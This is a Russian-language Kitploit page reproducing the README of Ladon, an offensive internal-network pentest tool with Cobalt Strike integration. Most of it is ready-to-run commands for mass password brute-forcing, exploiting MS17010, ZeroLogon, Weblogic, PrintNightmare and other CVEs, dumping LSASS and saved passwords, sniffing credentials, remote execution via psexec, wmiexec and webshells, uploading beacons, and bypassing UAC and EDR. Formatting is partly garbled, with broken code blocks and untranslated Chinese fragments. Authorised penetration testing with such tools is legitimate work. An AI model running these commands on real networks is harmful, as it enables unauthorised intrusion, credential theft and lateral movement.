Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Ladon — Ladon — крупномасштабный сканер внутренних сетей для пентеста: плагин для PowerShell и Cobalt Strike, загрузка в память, бесфайловое сканирование. Включает сканирование портов, распознавание сервисов, обнаружение сетевых активов, аудит паролей, поиск критически опасных уязвимостей, эксплуатацию уязвимостей, извлечение паролей и получение оболочки (GetShell) в один клик; поддерживает массовое сканирование сегментов A/B/C, сканирование через сетевые сегменты, а также сканирование по спискам URL, хостов и доменов. Обнаружение сетевых активов: с помощью 32 протоколов (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) или методов позволяет быстро получить IP-адреса живых хостов целевой сети, имена компьютеров, рабочие группы, общие ресурсы, MAC-адреса, версии операционных систем, веб-сайты, поддомены, промежуточное ПО, открытые сервисы, маршрутизаторы, коммутаторы, базы данных, принтеры и т. д. Большое количество модулей обнаружения критических уязвимостей: MS17010, Zimbra, Exchange. | Kitploit
Инструменты/GitHubGitHub/k8gege/ladon
Повышение привилегийРазведкаСканеры уязвимостейКартирование сетиАтаки на ПаролиСканирование портовЭксплуатацияЛатеральное перемещениеСбор информации

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Ladon — крупномасштабный сканер внутренних сетей для пентеста: плагин для PowerShell и Cobalt Strike, загрузка в память, бесфайловое сканирование. Включает сканирование портов, распознавание сервисов, обнаружение сетевых активов, аудит паролей, поиск критически опасных уязвимостей, эксплуатацию уязвимостей, извлечение паролей и получение оболочки (GetShell) в один клик; поддерживает массовое сканирование сегментов A/B/C, сканирование через сетевые сегменты, а также сканирование по спискам URL, хостов и доменов. Обнаружение сетевых активов: с помощью 32 протоколов (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) или методов позволяет быстро получить IP-адреса живых хостов целевой сети, имена компьютеров, рабочие группы, общие ресурсы, MAC-адреса, версии операционных систем, веб-сайты, поддомены, промежуточное ПО, открытые сервисы, маршрутизаторы, коммутаторы, базы данных, принтеры и т. д. Большое количество модулей обнаружения критических уязвимостей: MS17010, Zimbra, Exchange.

Веб-безопасность
Тестирование на Проникновение
Перечисление Поддоменов
GitHubk8gege/ladon

Ladon

РепозиторийСайт
5.3k8821 год назадПроверено Kitploit
Поделиться

Ladon — крупномасштабный сканер внутренней сети для пентеста, загрузка плагина Cobalt Strike в память

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Введение в программу

Ladon — крупномасштабный сканер внутренней сети для пентеста\доменного пентеста\горизонтальный инструмент, модуль PowerShell, плагин Cobalt Strike, загрузка в память, бесфайловое сканирование. Включает сканирование портов, определение сервисов, обнаружение сетевых активов, аудит паролей, обнаружение критических уязвимостей, эксплуатацию уязвимостей, чтение паролей и一键GetShell, поддерживает массовое сканирование сегментов A/B/C и межсегментное сканирование, поддерживает сканирование списков URL, хостов, доменов и т.д. Версия 12.2 включает 262 функциональных модуля, модуль обнаружения сетевых активов содержит 30+ протоколов (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) и методы быстрого получения информации о живых хостах целевой сети: IP, имя компьютера, рабочая группа, общие ресурсы, MAC-адрес, версия ОС, веб-сайты, поддомены, промежуточное ПО, открытые сервисы, маршрутизаторы, коммутаторы, базы данных, принтеры и т.д., обнаружение критических уязвимостей 16+ включает Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 серии, Printer и т.д., аудит паролей 25+ включает базы данных (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar и т.д., удаленное выполнение команд включает (smbexec/wmiexe/psexec/atexec/sshexec/webshell), модуль распознавания веб-отпечатков может распознавать 135+ (веб-приложения, промежуточное ПО, типы скриптов, типы страниц) и т.д., локальное повышение привилегий 21+ включает SweetPotato\BadPotato\EfsPotato\BypassUAC, высоконастраиваемые плагины POC поддерживают сборки .NET, DLL (C#/Delphi/VC), PowerShell и другие языки, поддерживает массовый вызов любых внешних программ или команд через конфигурацию INI, генератор EXP может одним кликом генерировать POC/EXP для уязвимостей, быстро расширяя возможности сканирования. Ladon поддерживает загрузку плагинов Cobalt Strike в память, бесфайловое сканирование для быстрого горизонтального перемещения во внутренней сети.

Скачать Ladon```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### Простота использования

Хотя Ladon обладает богатым и разнообразным функционалом, его использование очень простое, любой может легко освоиться.<br>
Для 90% функций достаточно одного или двух параметров, один модуль эквивалентен новому инструменту.

### Среда выполнения

#### Windows

Ladon может использоваться в системах Windows с установленным .NET 2.0 и выше (в системах Win7 и новее .NET встроен).<br>
Например: Cmd, PowerShell, удаленное управление Cmd, WebShell и т.д., а также загрузка в память через Cobalt Strike.<br>
Ladon.ps1 полностью совместим с PowerShell на Win7-Win11/2025, без оглядки на версии — удаленная загрузка, бесфайловая эксплуатация.

#### Кроссплатформенный LadonGo поддерживает Linux, Mac, Arm, MIPS
Все платформы: Linux, MacOS, Windows, маршрутизаторы, сетевое оборудование и другие ОС.<br>
https://github.com/k8gege/LadonGo

### Нестандартные условия

В реальных боях всё не так гладко: в некоторых внутренних сетях после проксирования соединение тормозит или вообще не работает, приходится загружать инструмент прямо на цель.<br>
Некоторые «кони» могут загружать программы размером в 2-3 МБ полдня или вообще не могут, а про Python-файлы по десяткам мегабайт и говорить нечего.<br>
Ladon разработан на C#, имеет небольшой размер — около 500 КБ, поэтому даже на плохом «коне» можно загрузить 500-килобайтную программу.<br>
Если и это не получается, можно использовать PowerShell для удаленной загрузки в память — в этом преимущество перед большими программами, скомпилированными на Python или Go.

### Миссия

Комплексное обслуживание: предоставить пользователю простой, удобный, функционально богатый и гибкий инструмент сканирования.

### Особенности

Небольшой трафик при сканировании<br>
Небольшой размер программы<br>
Богатый и мощный функционал<br>
Простота и удобство использования<br>
Поддержка плагинов на разных языках<br>
Кроссплатформенность (Win/Kali/Ubuntu и др.)<br>
Поддержка плагинов для Cobalt Strike<br>
Поддержка бесфайловой эксплуатации через PowerShell<br>
Генератор эксплойтов для создания Poc одной кнопкой<br>
Несколько версий для различных сред

### Параметры и функции программы

1  Сканирование по указанному IP<br>
2  Сканирование по указанному домену<br>
3  Сканирование по указанному имени компьютера<br>
4  Сканирование по указанному C-сегменту (ip/24)<br>
5  Сканирование по указанному B-сегменту (ip/16)<br>
6  Сканирование по указанному A-сегменту (ip/8)<br>
7  Сканирование по указанному URL<br>
8  Пакетное сканирование IP (ip.txt)<br>
9  Пакетное сканирование C-сегментов (ip24.txt)<br>
10 Пакетное сканирование C-сегментов (ipc.txt)<br>
11 Пакетное сканирование B-сегментов (ip16.txt)<br>
12 Пакетное сканирование URL (url.txt)<br>
13 Пакетное сканирование доменов (domain.txt)<br>
14 Пакетное сканирование имен компьютеров (host.txt)<br>
15 Пакетное сканирование CIDR-блоков стран (cidr.txt)<br>
16 Пакетное сканирование списка строк (str.txt)<br>
17 Список учётных записей/паролей хостов (check.txt)<br>
18 Список пользователей/паролей (userpass.txt)<br>
19 Сканирование C-сегмента в заданном диапазоне<br>
20 Загрузка пользовательской DLL через параметры (только C#)<br>
21 Загрузка пользовательского EXE через параметры (только C#)<br>
22 Загрузка пользовательского конфигурационного INI-файла через параметры<br>
23 Загрузка пользовательского PowerShell через параметры<br>
24 Пользовательские программы (системные команды или сторонние программы, разработанные на любом языке)<br>
25 Плагины (поддерживают несколько языков: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Поддержка Cobalt Strike (сканирование цели во внутренней сети из командной строки beacon или сканирование внешних целей через прыжок)<br>
27 Поддержка сканирования IP в формате CIDR, например 100.64.0.0/10, 192.168.1.1/20 и т.д.<br>
28 INI-конфигурация поддерживает брутфорс паролей пользовательских программ<br>

### Краткое руководство

Ladon Краткое руководство Полная документация: http://k8gege.org/Ladon <br>
Excel-документация по модулям: http://k8gege.org/Ladon/wiki.xlsx <br>
Поддержка загрузки в память из Cmd, Cobalt Strike, PowerShell и т.д.<br>
Версия для Windows: .Net, Cobalt Strike, PowerShell<br>
Версии для всех систем: GO (все платформы), Python (теоретически все платформы)<br>
PS: Study удобен для локального изучения, полный функционал используйте через CMD.

### BypassEDR сканирование

Скорость сканирования по умолчанию высокая, но некоторые WAF или EDR имеют сильную защиту.<br>
Даже при настройке нескольких потоков может прекратить работу примерно через 20 минут.<br>
BypassEDR имитирует человеческий доступ, обходя детекторы скорости.<br>
Скорость сканирования низкая, не используйте, если вам нужна скорость, как у «молодых и горячих».```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

Модули, связанные с брутфорсом паролей, временно не поддерживают параметр bypassEDR

001 Сканирование с пользовательскими потоками

Пример: сканирование сегмента 10.1.2 на наличие уязвимости MS17010
Однопоточное:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 потоков:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

При высокой защите установите низкое количество потоков сканирования, F однопоточный
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Сканирование прокси Socks5
Пример: сканирование сегмента 10.1.2 с использованием 8 потоков на наличие уязвимости MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

Подробнее см.: http://k8gege.org/Ladon/proxy.html

PS: Прокси-инструменты не поддерживают Socks5, поэтому необходимо добавить параметр noping при сканировании
Будь то Frp или другие подобные инструменты, главное, что такие инструменты, как Proxifier, не поддерживают протокол ICMP
Поскольку Ladon по умолчанию сначала использует ICMP для обнаружения активных узлов, а затем использует соответствующие модули для тестирования
Поэтому в прокси-среде необходимо отключить ping-сканирование, так как системный ping использует протокол ICMP

003 Сканирование подсети/массовое сканирование

CIDR формат: не только /24/16/8 (все)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Формат букв: только сегменты C B A в порядке сортировки```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Сканирование указанного диапазона IP и подсети

ICMP-обнаружение живых хостов в диапазоне 50-200 1-го сегмента```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMP сканирование живых хостов с 1.30 по 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  
004 ICMP массовое сканирование C-сегмента списка активных хостов```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP массовое сканирование активных хостов в списке B-сегмента```Bash
Ladon ip16.txt ICMP
006 Пакетное сканирование ICMP списка CIDR (например, диапазон IP некой страны)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP массовое сканирование доменов на доступность```Bash
Ladon domain.txt ICMP
008 ICMP массовое сканирование на наличие живых машин с использованием имени хоста или имени машины```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS массовое распознавание CMS, баннеров, SSL-сертификатов, заголовков; может распознавать неизвестные CMS, маршрутизаторы, принтеры, сетевое оборудование, камеры и т.д.```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Пакетное обнаружение версий, уязвимостей и слабых паролей маршрутизаторов DrayTek```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Массовое дешифрование паролей Base64```Bash
Ladon str.txt DeBase64

Сканирование активов, идентификация отпечатков, идентификация служб, живые хосты, сканирование портов

image

012 ICMP сканирование живых хостов (самое быстрое)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping для обнаружения активных хостов (вызов системной команды Ping, отображение информации в ms, ttl и т.д.)```Bash
Ladon 192.168.1.8/24 Ping

Если вы считаете, что хост жив только тогда, когда он отвечает на ping, вы можете использовать эту команду для массовой проверки.

014 Обнаружение живых хостов по нескольким протоколам (IP, имя машины, MAC/домен, производитель/версия системы)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Многопротокольное распознавание операционной системы (IP, имя хоста, версия ОС, открытые сервисы)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID обнаружение хоста с несколькими сетевыми картами```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNS-сканирование хоста с несколькими сетевыми картами```Bash
Ladon 192.168.1.8/24 DnsInfo
018 Многопротокольное сканирование живых хостов IP```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Сканирование уязвимости SMB MS17010 (IP, имя машины, ID уязвимости, версия ОС)```Bash
Ladon 192.168.1.8/24 MS17010
020 Обнаружение уязвимости SMBGhost CVE-2020-0796 (IP, имя машины, номер уязвимости, версия операционной системы)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Сканирование заголовков и баннеров веб-сайтов. Для получения более полной информации используйте модуль WhatCMS.```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Сканирование URL-адресов доменов сайтов C-сегмента```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 Сканирование URL-доменов сайтов C-сегмента```Bash
Ladon 192.168.1.8/24 SameWeb
024 Сканирование поддоменов, доменов второго уровня```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 IP разрешения доменных имён, IP разрешения имён хостов```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Пакетное разрешение IP-адресов доменных имен, пакетное разрешение IP-адресов имен хостов```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Пакетное разрешение доменных имен и имен хостов — результат только IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 DNS-запрос машин и IP в домене (в рамках домена, с указанием IP контроллера домена)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Запрос машин, IP в домене (условный домен)
Ladon GetDomainIP

##### 028 Сканирование портов сегмента C, сканирование указанных портов```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 Сканирование C-сегмента веб и определение CMS (800+ идентификация веб-отпечатков)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Сканирование устройств Cisco```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Перечисление хостов базы данных Mssql (IP базы данных, имя машины, версия SQL)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Перечисление сетевых общих ресурсов 	(домен, IP, имя хоста\путь к общему ресурсу)```Bash
Ladon EnumShare
033 сканирование LDAP сервера (обнаружение доменного контроллера)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 Сканирование FTP-сервера и определение версии```Bash
Ladon 192.168.1.8/24 FtpInfo

Брутфорс/Сетевая аутентификация/Слабые пароли/Взлом паролей/Базы данных/Панели управления сайтов/Страницы входа/Системный вход

image Подробное описание взлома паролей см. в SSH: http://k8gege.org/Ladon/sshscan.html

035 Порт 445 SMB взлом паролей (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 порт 135 брутфорс пароля Wmi (Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 389 порт LDAP сервер, взлом паролей домена AD (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Порт 5985 Брутфорс пароля Winrm (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 Порт 445 SMB NTLM HASH брутфорс (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 Порт 135 Wmi NTLM HASH брутфорс (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 22 порт SSH брутфорс пароля (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 Порт 1433 брутфорс паролей базы данных Mssql```Bash
Ladon 192.168.1.8/24 MssqlScan
043 порт 1521 брутфорс пароля Oracle базы данных```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
База данных Oracle особенная: взлом только библиотеки ORCL приведет к пропуску многих разрешений<br>
Подробнее см.: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 Порт 3306 Взлом пароля базы данных Mysql```Bash
Ladon 192.168.1.8/24 MysqlScan
045 порт 7001 брутфорс пароля бэкенда Weblogic```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 Порт 5900: брутфорс пароля VNC удаленного рабочего стола```Bash
Ladon 192.168.1.8/24 VncScan
047 Порт 21 взлом пароля FTP-сервера```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 взлом пароля входа в панель администратора Tomcat (порт 8080)```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Брутфорс пароля базовой аутентификации на веб-порте 401```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 139 порт Netbios протокол Windows взлом паролей```Bash
Ladon 192.168.1.8/24 NbtScan
053 порт 5985 протокол Winrm брутфорс пароля Windows```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 Взлом паролей IP-камер (встроенные пароли по умолчанию)```Bash
Ladon 192.168.1.8/24 DvrScan

Обнаружение уязвимостей/Poc

image

055 Обнаружение уязвимостей SMB (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 Обнаружение уязвимости SMBGhost CVE-2020-0796		911 зарезервировано```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Обнаружение уязвимостей Weblogic (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudy обнаружение бэкдора (phpstudy 2016/phpstudy 2018)  10.9 удалено 911 сохранено```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 Обнаружение уязвимости ActiveMQ(CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Обнаружение уязвимости Tomcat (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc

061 Обнаружение уязвимостей Struts2 (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 обнаружение уязвимости, определение версии Draytek, проверка слабых паролей```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 Обнаружение уязвимости неавторизованного RCE```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Эксплуатация уязвимости / Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Эксплуатация уязвимости Weblogic (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Эксплуатация уязвимости Tomcat (CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Windows 0day уязвимость универсальный DLL инъекция выполнение CMD генератор (DLL всего 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

066 CVE-2021-40444 Microsoft IE/Office 0day-уязвимость```Bash Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 EXP удаленного выполнения команд```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Проникновение в домен ZeroLogon CVE-2020-1472 повышение привилегий контроллера домена (обнуление пароля)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 уязвимость сериализации Exchange(.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 Эксплойт цикла ForExec (Win10 EternalDarkness CVE-2020-0796, успешный выход во избежание синего экрана цели)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### Загрузка и передача файлов

##### 071 Передача файлов во внутренней сети: HTTP загрузка, HTTPS загрузка, MSF загрузка```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Передача файлов во внутренней сети Скачивание по FTP```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Шифрование/дешифрование (HEX/Base64)

##### 073 Шифрование/дешифрование Hex```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex

074 Base64 шифрование и дешифрование```Bash Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Сетевой сниффинг

##### 075 Сниффинг паролей FTP (привязка к локальному IP, автоматический сниффинг C-сегмента)
Машины с несколькими сетевыми картами, сниффинг соответствующих IP-адресов C-сегмента.```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTP-сниффинг паролей (привязка к локальному IP, автоматический сниффинг C-сегмента)

Многокарточная машина, сниффинг соответствующих IP-адресов C-сегмента```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 Сетевой сниффинг```Bash
Ladon Sniffer

Чтение паролей

078 Чтение паролей сайта IIS, пути сайта```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Прочитать пароль от подключенного Wi-Fi```Bash
Ladon WifiPwd
080 Чтение паролей FileZilla FTP```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Чтение системных Hash, паролей VPN, DPAPI-Key  10.9 Удаление```Bash
Ladon CVE-2021-36934  
082 DumpLsass пароли из памяти (открытый текст mimikatz) до версии 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Сбор информации

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API просмотр текущего пользователя```Bash
Ladon w
Ladon whoami
Получить локальный внутренний IP и внешний IP```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Получить PCname GUID CPUID DiskID MAC-адрес```Bash
Ladon GetID
085 Просмотр недавно открытых файлов пользователя```Bash

Ladon Recent

root@kitploit:~
##### 086 Просмотр истории использования USB-накопителей (Имя USB, метка USB, информация о пути)```Bash
Ladon UsbLog
087 Обнаружение бэкдора (загрузочные записи реестра, DLL-перехват)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Подробности процесса (путь к программе, разрядность, параметры запуска, пользователь)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Получение аргументов командной строки```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Получение базовой информации о пентесте```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell версия```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 Версия среды выполнения&среда сборки```Bash
Ladon Ver
Ladon Version
093 версия среды выполнения & среда сборки & список установленного ПО```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 Просмотр информации о прокси IE```Bash
Ladon QueryProxy
095 DirList листинг каталогов + базовая информация для пентеста
По умолчанию вывод всего диска
```Bash

Ladon DirList

root@kitploit:~
###### Укажите букву диска или каталог```Bash
Ladon DirList c:\   
096 QueryAdmin просмотр пользователей администратора```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 Просмотр локальных именованных каналов```Bash
Ladon GetPipe
098 RdpLog Просмотр записей подключений 3389```Bash

Ladon RdpLog

root@kitploit:~
### Удаленное выполнение (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### порты 099 445 Зашифрованное PSEXEC удаленное выполнение команд (интерактивное)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135 порт WmiExec удаленное выполнение команд (неинтерактивный)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 порт 445 AtExec удаленное выполнение команд (неинтерактивный)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 Порт 22: SshExec удаленное выполнение команд (неинтерактивное)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell удаленное выполнение команд (неинтерактивное) удалено в 9.3.0
Использование:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell удаленное выполнение команд (неинтерактивный) удалено в 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### 105 135 порт WmiExec2 удаленное выполнение команд с поддержкой HASH (неинтерактивный) поддержка загрузки файлов```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 445 порт SmbExec Ntlm-Hash неинтерактивное удаленное выполнение команд (без вывода)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec удаленное выполнение команд без эха (поддержка прав System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Повышение и понижение привилегий

image

108 whoami просмотр текущих прав пользователя и привилегий```Bash

Ladon whoami

root@kitploit:~
##### 109 6 видов белых списков BypassUAC (после 8.0) Win7-Win10 Удалено в версии 10.8, оставлено только 911  
Использование: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 обход UAC, поддержка Win7-Win10 10.8 версия удалена, сохранена только 911```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)эксплойт повышения привилегий через уязвимость принтера```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool уязвимость принтера для повышения привилегий EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem выполнение CMD с правами SYSTEM```Bash
Ladon GetSystem cmd.exe
